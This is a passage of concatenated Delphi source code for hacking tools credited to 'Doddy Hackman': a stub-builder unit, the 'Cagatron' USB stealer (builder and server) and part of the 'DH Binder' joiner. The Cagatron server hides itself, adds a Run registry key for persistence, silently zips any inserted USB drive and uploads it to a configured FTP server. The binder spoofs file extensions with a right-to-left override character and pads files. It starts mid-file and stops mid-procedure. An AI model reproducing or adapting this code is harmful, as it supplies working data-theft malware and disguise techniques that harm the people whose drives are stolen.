clave: integer; // Declaramos la variable "clave" como integer
datos: string; // Declaramos la variable "datos" como string
ip_found: string; // Declaramos la variable "ip_found" como string
port_found: string; // Declaramos la variable "port_found" como string
begin
clave := 123; // Establecemos la variable "clave" como 123
datos := leer_recurso(clave); // Leemos el recurso usando el key que esta
// en la variable clave y guardamos los datos en la variable "datos"
ip_found := regex(datos, '[ip]', '[ip]');
// Usamos la funcion regex() para buscar
// la ip y la guardamos en la variable "ip_found"
port_found := regex(datos, '[port]', '[port]');
// Usamos la funcion regex() para
// buscar el puerto y lo guardamos en la variable "port_found"
ip.text := ip_found; // Mostramos en el edit "ip" la IP
port.text := port_found; // Mostramos en el edit "port" el puerto
ShowMessage('Loaded'); // Mostramos en pantalla un mensaje
end;
function regex(text: string; deaca: string; hastaaca: string): string;
begin
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function xor_now(texto: string; clave: integer): string;
// Funcion xor_now con el argumento
// del texto a crifrar y la clave a usar
var
numero: integer; // Declaramos la variable "numero" como entero
contenido: string; // Declaramos la variable "contenido" como string
begin
contenido := ''; // Vaciamos la variable contenido
for numero := 1 to Length(texto) do // Realizamos un for del "1"
// a la longitud de la variable texto
begin
contenido := contenido + Char(integer(texto[numero]) xor clave);
// Realizamos el cifrado xor
end;
Result := contenido; // Devolvemos como resultado la variable contenido
end;
function leyendo_recurso: string;
var
leyendo1: HRSRC; // Establecemos la variable "leyendo1" como HRSRC
leyendo2: DWORD; // Establecemos la variable "leyendo2" como DWORD
leyendo3: THandle; // Establecemos la variable "leyendo3" como THandle
leyendo4: pointer; // Establecemos la variable "leyendo4" como Pointer
begin
leyendo1 := FindResource(hInstance, 'CONFIGURATION', RT_RCDATA);
// Buscamos el recurso
// "CONFIGURATION"
leyendo2 := SizeofResource(hInstance, leyendo1);
// Calculamos la tamaño del recurso
leyendo3 := LoadResource(hInstance, leyendo1); // Cargamos el recurso
leyendo4 := LockResource(leyendo3);
// Bloqueamos el recurso para poder leerlo despues
if leyendo4 <> nil then // Si "leyendo4" no esta null ...
begin
SetLength(Result, leyendo2 - 1); // Cambiamos la longitud de Result
CopyMemory(@Result[1], leyendo4, leyendo2);
// Copiamos los datos al resultado de la funcion
FreeResource(leyendo3); // Liberamos el recurso
end;
end;
function leer_recurso(clave: integer): string;
var
datos: string; // Declaramos la variable "datos" como string
begin
datos := xor_now(leyendo_recurso, clave);
// Realizamos el cifrado xor con los datos que usamos
// como argumentos de la funcion leer_recurso()
datos := regex(datos, '-0x646F646479206861636B6D616E-',
'-0x646F646479206861636B6D616E-');
// Usamos la funcion regex() para cortar los delimitadores
// y encontrar asi los datos del recurso para despues guardar el
// resultado en la variable "datos"
Result := datos;
// Devolvemos como resultado lo que contiene la variable "datos"
end;
// Unit : Builder Tools
// Version : 0.2
// (C) Doddy Hackman 2015
// Credits : Resources based in http://www.hackforums.net/showthread.php?tid=1422700
// Examples :
// escribir_eof('stub.exe','-delimitador-','-delimitador-','test',123);
// leer_eof('stub.exe','-delimitador-','-delimitador-',123);
// escribir_recurso('stub.exe','test',123);
// leer_recurso(123);
unit builder_tools;
interface
uses SysUtils, Windows;
function leer_eof(ruta, delimitador1, delimitador2: string;
clave: integer): string;
function escribir_eof(ruta, delimitador1, delimitador2, texto: string;
clave: integer): bool;
function escribir_recurso(ruta: string; datos: string; clave: integer): bool;
function leyendo_recurso: string;
function leer_recurso(clave: integer): string;
function xor_now(texto: string; clave: integer): string;
function regex(text: string; deaca: string; hastaaca: string): string;
implementation
function xor_now(texto: string; clave: integer): string;
var
numero: integer;
contenido: string;
begin
contenido := '';
for numero := 1 to Length(texto) do
begin
contenido := contenido + Char(integer(texto[numero]) xor clave);
end;
Result := contenido;
end;
function regex(text: string; deaca: string; hastaaca: string): string;
begin
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function leer_eof(ruta, delimitador1, delimitador2: string;
clave: integer): string;
var
ob: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
resultado: string;
begin
ob := INVALID_HANDLE_VALUE;
code := '';
ob := CreateFile(pchar(ruta), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (ob <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(ob, -9999, nil, FILE_END);
ReadFile(ob, code, 9999, nose, nil);
CloseHandle(ob);
end;
resultado := regex(code, delimitador1, delimitador2);
resultado := xor_now(resultado, clave);
Result := resultado;
end;
function escribir_eof(ruta, delimitador1, delimitador2, texto: string;
clave: integer): bool;
var
linea: string;
aca: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
marca_uno: string;
marca_dos: string;
begin
aca := INVALID_HANDLE_VALUE;
nose := 0;
begin
linea := delimitador1 + xor_now(texto, clave) + delimitador2;
StrCopy(code, pchar(linea));
aca := CreateFile(pchar(ruta), GENERIC_WRITE, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (aca <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(aca, 0, nil, FILE_END);
WriteFile(aca, code, 9999, nose, nil);
CloseHandle(aca);
Result := True;
end
else
begin
Result := False;
end;
end;
end;
function escribir_recurso(ruta: string; datos: string; clave: integer): bool;
var
escribiendo: THandle;
begin
datos := xor_now('-0x646F646479206861636B6D616E-' + datos +
'-0x646F646479206861636B6D616E-', clave);
escribiendo := BeginUpdateResource(pchar(ruta), False);
UpdateResource(escribiendo, MakeIntResource(10), 'CONFIGURATION', 0,
pchar(datos), (Length(datos) + 1) * SizeOf(datos[1]));
EndUpdateResource(escribiendo, False);
Result := True;
end;
function leyendo_recurso: string;
var
leyendo1: HRSRC;
leyendo2: DWORD;
leyendo3: THandle;
leyendo4: pointer;
begin
leyendo1 := FindResource(hInstance, 'CONFIGURATION', RT_RCDATA);
leyendo2 := SizeofResource(hInstance, leyendo1);
leyendo3 := LoadResource(hInstance, leyendo1);
leyendo4 := LockResource(leyendo3);
if leyendo4 <> nil then
begin
SetLength(Result, leyendo2 - 1);
CopyMemory(@Result[1], leyendo4, leyendo2);
FreeResource(leyendo3);
end;
end;
function leer_recurso(clave: integer): string;
var
datos: string;
begin
datos := xor_now(leyendo_recurso, clave);
datos := regex(datos, '-0x646F646479206861636B6D616E-',
'-0x646F646479206861636B6D616E-');
Result := datos;
end;
end.
// The End ?
// Project Cagatron 1.0
// (C) Doddy Hackman 2015
// Based on Ladron by Khronos
unit caga;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, sevenzip, Vcl.ComCtrls, Vcl.StdCtrls,
ShellApi,
Vcl.Menus, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
IdExplicitTLSClientServerBase, IdFTP, Vcl.ExtCtrls, Vcl.Imaging.pngimage;
type
TForm1 = class(TForm)
PageControl1: TPageControl;
TabSheet1: TTabSheet;
TabSheet2: TTabSheet;
TabSheet3: TTabSheet;
StatusBar1: TStatusBar;
PageControl2: TPageControl;
TabSheet4: TTabSheet;
usb_found: TListView;
TabSheet5: TTabSheet;
TabSheet6: TTabSheet;
GroupBox1: TGroupBox;
Label1: TLabel;
ftp_host: TEdit;
Label2: TLabel;
ftp_user: TEdit;
Label3: TLabel;
ftp_pass: TEdit;
Label4: TLabel;
ftp_path: TEdit;
GroupBox2: TGroupBox;
enter_usb: TEdit;
Button1: TButton;
Button2: TButton;
GroupBox3: TGroupBox;
upload_ftp_server: TRadioButton;
TabSheet7: TTabSheet;
GroupBox4: TGroupBox;
console: TMemo;
TabSheet8: TTabSheet;
only_logs: TRadioButton;
logs: TListView;
rutas: TListBox;
menu: TPopupMenu;
L1: TMenuItem;
IdFTP1: TIdFTP;
buscar_usb: TTimer;
otromenu: TPopupMenu;
S1: TMenuItem;
opcion_text: TEdit;
PageControl3: TPageControl;
TabSheet9: TTabSheet;
TabSheet10: TTabSheet;
GroupBox5: TGroupBox;
Label5: TLabel;
Label6: TLabel;
Label7: TLabel;
Label8: TLabel;
ftp_host2: TEdit;
ftp_user2: TEdit;
ftp_pass2: TEdit;
ftp_path2: TEdit;
GroupBox7: TGroupBox;
directorios: TComboBox;
GroupBox6: TGroupBox;
foldername: TEdit;
Button3: TButton;
GroupBox8: TGroupBox;
Image1: TImage;
Label9: TLabel;
Image2: TImage;
GroupBox9: TGroupBox;
hide_file: TCheckBox;
upload_ftp: TCheckBox;
procedure FormCreate(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure list_files;
procedure L1Click(Sender: TObject);
procedure buscar_usbTimer(Sender: TObject);
procedure S1Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := length(texto);
for num := 1 to cantidad div 2 do
begin
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
function usb_name(checked: Char): string;
// Based on http://delphitutorial.info/get-volume-name.html
var
uno, dos: DWORD;
resultnow: array [0 .. MAX_PATH] of Char;
begin
try
GetVolumeInformation(PChar(checked + ':/'), resultnow, sizeof(resultnow),
nil, uno, dos, nil, 0);
Result := StrPas(resultnow);
except
Result := checked;
end;
end;
function check_drive(target: string): boolean;
var
a, b, c: cardinal;
begin
Result := GetVolumeInformation(PChar(target), nil, 0, @c, a, b, nil, 0);
end;
function file_size(target: String): integer;
var
busqueda: TSearchRec;
begin
Result := 0;
try
begin
if FindFirst(target + '\*.*', faAnyFile + faDirectory + faReadOnly,
busqueda) = 0 then
begin
repeat
Inc(Result);
until FindNext(busqueda) <> 0;
System.SysUtils.FindClose(busqueda);
end;
end;
except
Result := 0;
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
if not DirectoryExists('logs') then
begin
CreateDir('logs');
end;
Chdir('logs');
list_files;
end;
procedure TForm1.L1Click(Sender: TObject);
begin
ShellExecute(0, nil, PChar(rutas.Items[logs.Selected.Index]), nil, nil,
SW_SHOWNORMAL);
end;
procedure TForm1.list_files;
var
search: TSearchRec;
ext: string;
fecha1: integer;
begin
logs.Items.Clear();
rutas.Items.Clear();
FindFirst(ExtractFilePath(Application.ExeName) + 'logs' + '\*.*',
faAnyFile, search);
while FindNext(search) = 0 do
begin
ext := ExtractFileExt(search.Name);
if (ext = '.zip') then
begin
with logs.Items.Add do
begin
fecha1 := FileAge(ExtractFilePath(Application.ExeName) + 'logs/' +
search.Name);
rutas.Items.Add(ExtractFilePath(Application.ExeName) + 'logs/' +
search.Name);
Caption := search.Name;
SubItems.Add(DateToStr(FileDateToDateTime(fecha1)));
end;
end;
end;
FindClose(search);
end;
procedure TForm1.S1Click(Sender: TObject);
begin
opcion_text.Text := usb_found.Selected.Caption;
enter_usb.Text := usb_found.Selected.SubItems[1];
end;
procedure TForm1.buscar_usbTimer(Sender: TObject);
var
unidad: Char;
begin
usb_found.Items.Clear();
for unidad := 'C' to 'Z' do
begin
if (check_drive(PChar(unidad + ':\')) = True) and
(GetDriveType(PChar(unidad + ':\')) = DRIVE_REMOVABLE) then
begin
with usb_found.Items.Add do
begin
Caption := usb_name(unidad);
SubItems.Add(IntToStr(file_size(unidad + ':\')));
SubItems.Add(unidad + ':\');
end;
end;
end;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
with TFileOpenDialog.Create(nil) do
try
Options := [fdoPickFolders];
if Execute then
enter_usb.Text := Filename;
finally
Free;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
zipnow: I7zOutArchive;
busqueda: TSearchRec;
code: string;
dirnow: string;
guardar: string;
begin
dirnow := enter_usb.Text;
if not FileExists(PChar(ExtractFilePath(Application.ExeName) + '/' + '7z.dll'))
then
begin
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/7z.dll'),
PChar(ExtractFilePath(Application.ExeName) + '/' + '7z.dll'), True);
end;
if not(opcion_text.Text = '') then
begin
guardar := opcion_text.Text + '.zip';
end
else
begin
guardar := ExtractFileName(dirnow) + '.zip';
end;
StatusBar1.Panels[0].Text := '[+] Saving ...';
Form1.StatusBar1.Update;
console.Lines.Add('[+] Saving ..');
zipnow := CreateOutArchive(CLSID_CFormat7z);
SetCompressionLevel(zipnow, 9);
SevenZipSetCompressionMethod(zipnow, m7LZMA);
if FindFirst(dirnow + '\*.*', faAnyFile + faDirectory + faReadOnly,
busqueda) = 0 then
begin
repeat
if (busqueda.Attr = faDirectory) then
begin
if not(busqueda.Name = '.') and not(busqueda.Name = '..') then
begin
console.Lines.Add('[+] Saving Directory : ' + busqueda.Name);
// StatusBar1.Panels[0].Text := '[+] Saving Directory : ' + busqueda.Name;
// Form1.StatusBar1.Update;
zipnow.AddFiles(dirnow + '/' + busqueda.Name, busqueda.Name,
'*.*', True);
end;
end
else
begin
console.Lines.Add('[+] Saving File : ' + busqueda.Name);
// StatusBar1.Panels[0].Text := '[+] Saving File : ' + busqueda.Name;
// Form1.StatusBar1.Update;
zipnow.AddFile(dirnow + '/' + busqueda.Name, busqueda.Name);
end;
until FindNext(busqueda) <> 0;
System.SysUtils.FindClose(busqueda);
end;
zipnow.SaveToFile(guardar);
if (upload_ftp_server.checked) then
begin
IdFTP1.Host := ftp_host.Text;
IdFTP1.Username := ftp_user.Text;
IdFTP1.Password := ftp_pass.Text;
try
IdFTP1.Connect;
except
StatusBar1.Panels[0].Text := '[-] Error Uploading';
Form1.StatusBar1.Update;
end;
StatusBar1.Panels[0].Text := '[+] Uploading ...';
Form1.StatusBar1.Update;
IdFTP1.ChangeDir(ftp_path.Text);
IdFTP1.Put(guardar, guardar, False);
end;
list_files;
console.Lines.Add('[+] Ready');
StatusBar1.Panels[0].Text := '[+] Ready';
Form1.StatusBar1.Update;
opcion_text.Text := '';
end;
procedure TForm1.Button3Click(Sender: TObject);
var
lineafinal: string;
hidefile: string;
uploadftp: string;
aca: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
stubgenerado: string;
begin
if (hide_file.checked) then
begin
hidefile := '1';
end
else
begin
hidefile := '0';
end;
if (upload_ftp.checked) then
begin
uploadftp := '1';
end
else
begin
uploadftp := '0';
end;
lineafinal := '[63686175]' + dhencode('[online]1[online]' + '[directorios]' +
directorios.Text + '[directorios]' + '[carpeta]' + foldername.Text +
'[carpeta]' + '[ocultar]' + hidefile + '[ocultar]' + '[ftp_op]' + uploadftp
+ '[ftp_op]' + '[ftp_host]' + ftp_host.Text + '[ftp_host]' + '[ftp_user]' +
ftp_user.Text + '[ftp_user]' + '[ftp_pass]' + ftp_pass.Text + '[ftp_pass]' +
'[ftp_path]' + ftp_path.Text + '[ftp_path]', 'encode') + '[63686175]';
aca := INVALID_HANDLE_VALUE;
nose := 0;
stubgenerado := 'cagatron_ready.exe';
DeleteFile(stubgenerado);
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' +
'Data/cagatron_server.exe'), PChar(ExtractFilePath(Application.ExeName) +
'/' + stubgenerado), True);
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/7z.dll'),
PChar(ExtractFilePath(Application.ExeName) + '/' + '7z.dll'), True);
StrCopy(code, PChar(lineafinal));
aca := CreateFile(PChar(ExtractFilePath(Application.ExeName) +
'/cagatron_ready.exe'), GENERIC_WRITE, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (aca <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(aca, 0, nil, FILE_END);
WriteFile(aca, code, 9999, nose, nil);
CloseHandle(aca);
end;
StatusBar1.Panels[0].Text := '[+] Done';
Form1.StatusBar1.Update;
end;
end.
// The End ?
// Project Cagatron 1.0
// (C) Doddy Hackman 2015
// Based on Ladron by Khronos
program cagatron_server;
{$APPTYPE GUI}
{$R *.res}
uses
SysUtils, WinInet, Windows, sevenzip;
var
directorio, directorio_final, carpeta, nombrereal, yalisto: string;
hide_op: string;
registro: HKEY;
ftp_op, ftp_host, ftp_user, ftp_pass, ftp_path: string;
online: string;
ob: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
todo: string;
// Functions
function regex(text: String; deaca: String; hastaaca: String): String;
begin
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad div 2 do
begin
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
procedure comprimir(dirnow, guardar: string);
var
zipnow: I7zOutArchive;
busqueda: TSearchRec;
begin
zipnow := CreateOutArchive(CLSID_CFormat7z);
SetCompressionLevel(zipnow, 9);
SevenZipSetCompressionMethod(zipnow, m7LZMA);
if FindFirst(dirnow + '\*.*', faAnyFile + faDirectory + faReadOnly,
busqueda) = 0 then
begin
repeat
if (busqueda.Attr = faDirectory) then
begin
if not(busqueda.Name = '.') and not(busqueda.Name = '..') then
begin
zipnow.AddFiles(dirnow + '/' + busqueda.Name, busqueda.Name,
'*.*', True);
end;
end
else
begin
zipnow.AddFile(dirnow + '/' + busqueda.Name, busqueda.Name);
end;
until FindNext(busqueda) <> 0;
System.SysUtils.FindClose(busqueda);
end;
zipnow.SaveToFile(guardar);
if (hide_op = '1') then
begin
SetFileAttributes(pchar(guardar), FILE_ATTRIBUTE_HIDDEN);
end;
end;
function usb_name(checked: Char): string;
// Based on http://delphitutorial.info/get-volume-name.html
var
uno, dos: DWORD;
resultnow: array [0 .. MAX_PATH] of Char;
begin
try
GetVolumeInformation(pchar(checked + ':/'), resultnow, sizeof(resultnow),
nil, uno, dos, nil, 0);
Result := StrPas(resultnow);
except
Result := checked;
end;
end;
function check_drive(target: string): boolean;
var
a, b, c: cardinal;
begin
Result := GetVolumeInformation(pchar(target), nil, 0, @c, a, b, nil, 0);
end;
function check_file_ftp(host, username, password, archivo: pchar): integer;
var
controluno: HINTERNET;
controldos: HINTERNET;
abriendo: HINTERNET;
valor: integer;
begin
controluno := InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
controldos := InternetConnect(controluno, host, INTERNET_DEFAULT_FTP_PORT,
username, password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
abriendo := ftpOpenfile(controldos, pchar(archivo), GENERIC_READ,
FTP_TRANSFER_TYPE_BINARY, 0);
valor := ftpGetFileSize(abriendo, nil);
InternetCloseHandle(controldos);
InternetCloseHandle(controluno);
Result := valor;
end;
procedure upload_ftpfile(host, username, password, filetoupload,
conestenombre: pchar);
// Credits :
// Based on : http://stackoverflow.com/questions/1380309/why-is-my-program-not-uploading-file-on-remote-ftp-server
// Thanks to Omair Iqbal
var
controluno: HINTERNET;
controldos: HINTERNET;
begin
try
begin
controluno := InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
controldos := InternetConnect(controluno, host, INTERNET_DEFAULT_FTP_PORT,
username, password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
ftpPutFile(controldos, filetoupload, conestenombre,
FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(controldos);
InternetCloseHandle(controluno);
end
except
//
end;
end;
procedure buscar_usb;
var
unidad: Char;
usb_target, usb_nombre: string;
begin
while (1 = 1) do
begin
Sleep(5000);
for unidad := 'C' to 'Z' do
begin
if (check_drive(pchar(unidad + ':\')) = True) and
(GetDriveType(pchar(unidad + ':\')) = DRIVE_REMOVABLE) then
begin
usb_target := unidad + ':\';
usb_nombre := usb_name(unidad) + '.zip';
if not(FileExists(usb_nombre)) then
begin
// Writeln('[+] Saving ' + usb_target + ' : ' + usb_nombre + ' ...');
comprimir(usb_target, usb_nombre);
// Writeln('[+] Saved');
if (ftp_op = '1') then
begin
// Writeln('[+] Checking file in FTP ...');
if (check_file_ftp(pchar(ftp_host), pchar(ftp_user),
pchar(ftp_pass), pchar('/' + ftp_path + '/' + usb_nombre)) = -1)
then
begin
// Writeln('[+] Uploading ...');
upload_ftpfile(pchar(ftp_host), pchar(ftp_user), pchar(ftp_pass),
pchar(usb_nombre), pchar('/' + ftp_path + '/' + usb_nombre));
// Writeln('[+] Done');
end
else
begin
// Writeln('[+] File exists');
end;
end;
end;
end;
end;
end;
end;
begin
try
ob := INVALID_HANDLE_VALUE;
code := '';
ob := CreateFile(pchar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (ob <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(ob, -9999, nil, FILE_END);
ReadFile(ob, code, 9999, nose, nil);
CloseHandle(ob);
end;
todo := regex(code, '[63686175]', '[63686175]');
todo := dhencode(todo, 'decode');
directorio := pchar(regex(todo, '[directorios]', '[directorios]'));
carpeta := pchar(regex(todo, '[carpeta]', '[carpeta]'));
directorio_final := GetEnvironmentVariable(directorio) + '/' + carpeta;
hide_op := pchar(regex(todo, '[ocultar]', '[ocultar]'));
ftp_op := pchar(regex(todo, '[ftp_op]', '[ftp_op]'));
ftp_host := pchar(regex(todo, '[ftp_host]', '[ftp_host]'));
ftp_user := pchar(regex(todo, '[ftp_user]', '[ftp_user]'));
ftp_pass := pchar(regex(todo, '[ftp_pass]', '[ftp_pass]'));
ftp_path := pchar(regex(todo, '[ftp_path]', '[ftp_path]'));
online := pchar(regex(todo, '[online]', '[online]'));
if (online = '1') then
begin
nombrereal := ExtractFileName(paramstr(0));
yalisto := directorio_final + '/' + nombrereal;
if not(DirectoryExists(directorio_final)) then
begin
CreateDir(directorio_final);
end;
// CopyFile(pchar(paramstr(0)), pchar(yalisto), False);
MoveFile(pchar(paramstr(0)), pchar(yalisto));
if (hide_op = '1') then
begin
SetFileAttributes(pchar(yalisto), FILE_ATTRIBUTE_HIDDEN);
end;
if (FileExists('7z.dll')) then
begin
// CopyFile(pchar('7z.dll'),
// pchar(directorio_final + '/' + '7z.dll'), False);
MoveFile(pchar('7z.dll'), pchar(directorio_final + '/' + '7z.dll'));
if (hide_op = '1') then
begin
SetFileAttributes(pchar(directorio_final + '/' + '7z.dll'),
FILE_ATTRIBUTE_HIDDEN);
end;
end;
ChDir(directorio_final);
if (hide_op = '1') then
begin
SetFileAttributes(pchar(directorio_final), FILE_ATTRIBUTE_HIDDEN);
end;
try
begin
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil,
REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil);
RegSetValueEx(registro, 'uberk', 0, REG_SZ, pchar(yalisto), 666);
RegCloseKey(registro);
end;
except
//
end;
// Writeln('[+] Searching USB ...');
BeginThread(nil, 0, @buscar_usb, nil, 0, PDWORD(0)^);
while (1 = 1) do
Sleep(5000);
end
else
begin
// Writeln('[+] Offline');
end;
except
on E: Exception do
Writeln(E.ClassName, ': ', E.Message);
end;
end.
// The End ?
// DH Binder 1.0
// (C) Doddy Hackman 2015
// Credits :
// Joiner Based in : "Ex Binder v0.1" by TM
// Icon Changer based in : "IconChanger" By Chokstyle
// Thanks to TM & Chokstyle
unit binder;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
Vcl.ExtCtrls, ShellApi, Vcl.ImgList, Vcl.Menus, Vcl.Imaging.pngimage, madRes,
StrUtils;
type
TForm1 = class(TForm)
PageControl1: TPageControl;
TabSheet1: TTabSheet;
TabSheet2: TTabSheet;
TabSheet3: TTabSheet;
PageControl2: TPageControl;
TabSheet4: TTabSheet;
TabSheet5: TTabSheet;
GroupBox1: TGroupBox;
PageControl3: TPageControl;
TabSheet6: TTabSheet;
TabSheet7: TTabSheet;
TabSheet8: TTabSheet;
files: TListView;
StatusBar1: TStatusBar;
GroupBox2: TGroupBox;
archivo_nuevo: TEdit;
Button1: TButton;
GroupBox3: TGroupBox;
execute: TComboBox;
abrir: TOpenDialog;
GroupBox4: TGroupBox;
Button2: TButton;
GroupBox5: TGroupBox;
extraction: TComboBox;
GroupBox6: TGroupBox;
opcion_ocultar: TCheckBox;
check_filepumper: TCheckBox;
GroupBox7: TGroupBox;
GroupBox8: TGroupBox;
pumper_count: TEdit;
UpDown1: TUpDown;
pumper_type: TComboBox;
check_extension_changer: TCheckBox;
GroupBox9: TGroupBox;
check_extension: TCheckBox;
extensiones: TComboBox;
GroupBox10: TGroupBox;
check_this_extension: TCheckBox;
extension: TEdit;
GroupBox11: TGroupBox;
ruta_icono: TEdit;
Button3: TButton;
GroupBox12: TGroupBox;
use_icon_changer: TCheckBox;
preview: TImage;
imagenes: TImageList;
menu: TPopupMenu;
C1: TMenuItem;
Image2: TImage;
GroupBox13: TGroupBox;
Button4: TButton;
TabSheet9: TTabSheet;
GroupBox14: TGroupBox;
Image3: TImage;
Label1: TLabel;
D1: TMenuItem;
abrir_icono: TOpenDialog;
procedure Button1Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure C1Click(Sender: TObject);
procedure Button4Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure D1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Functions
procedure file_pumper(archivo: string; cantidad: LongWord);
var
arraycantidad: array of Byte;
abriendo: TFileStream;
begin
abriendo := TFileStream.Create(archivo, fmOpenReadWrite);
SetLength(arraycantidad, cantidad);
ZeroMemory(@arraycantidad[1], cantidad);
abriendo.Seek(0, soFromEnd);
abriendo.Write(arraycantidad[0], High(arraycantidad));
abriendo.Free;
end;
procedure extension_changer(archivo: string; extension: string);
var
nombre: string;
begin
nombre := ExtractFileName(archivo);
nombre := StringReplace(nombre, ExtractFileExt(nombre), '',
[rfReplaceAll, rfIgnoreCase]);
nombre := nombre + char(8238) + ReverseString('.' + extension) + '.exe';
MoveFile(PChar(archivo), PChar(ExtractFilePath(archivo) + nombre));
end;
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := length(texto);
for num := 1 to cantidad div 2 do
begin
aca := char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
//
procedure TForm1.Button1Click(Sender: TObject);
begin
if (abrir.execute) then
begin
archivo_nuevo.Text := abrir.FileName;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
icono: TIcon;
listate: TListItem;
getdata: SHFILEINFO;
begin
if (FileExists(archivo_nuevo.Text)) then
begin
icono := TIcon.Create;
files.Items.BeginUpdate;
with files do
begin
listate := files.Items.Add;
listate.Caption := ExtractFileName(archivo_nuevo.Text);
listate.SubItems.Add(archivo_nuevo.Text);
listate.SubItems.Add(ExtractFileExt(archivo_nuevo.Text));
listate.SubItems.Add(execute.Text);
SHGetFileInfo(PChar(archivo_nuevo.Text), 0, getdata, SizeOf(getdata),
SHGFI_ICON or SHGFI_SMALLICON);
icono.Handle := getdata.hIcon;
listate.ImageIndex := imagenes.AddIcon(icono);
DestroyIcon(getdata.hIcon);
end;
files.Items.EndUpdate;
archivo_nuevo.Text := '';
StatusBar1.Panels[0].Text := '[+] File Added';
Form1.StatusBar1.Update;
end
else
begin
StatusBar1.Panels[0].Text := '[-] File not exists';
Form1.StatusBar1.Update;
end;
end;
procedure TForm1.Button3Click(Sender: TObject);
begin
if (abrir_icono.execute) then
begin
ruta_icono.Text := abrir_icono.FileName;
preview.Picture.LoadFromFile(abrir_icono.FileName);
end;
end;
procedure TForm1.Button4Click(Sender: TObject);
var
i: integer;
nombre: string;
ruta: string;
tipo: string;
savein: string;
opcionocultar: string;
lineafinal: string;
uno: DWORD;
tam: DWORD;
dos: DWORD;
tres: DWORD;
todo: Pointer;
change: DWORD;
valor: string;
stubgenerado: string;
ruta_archivo: string;
tipocantidadz: string;
extensionacambiar: string;
begin
StatusBar1.Panels[0].Text := '[+] Working ...';
Form1.StatusBar1.Update;
if (files.Items.Count = 0) or (files.Items.Count = 1) then
begin
ShowMessage('You have to choose two or more files');
end
else
begin
stubgenerado := 'done.exe';
if (opcion_ocultar.Checked = True) then
begin
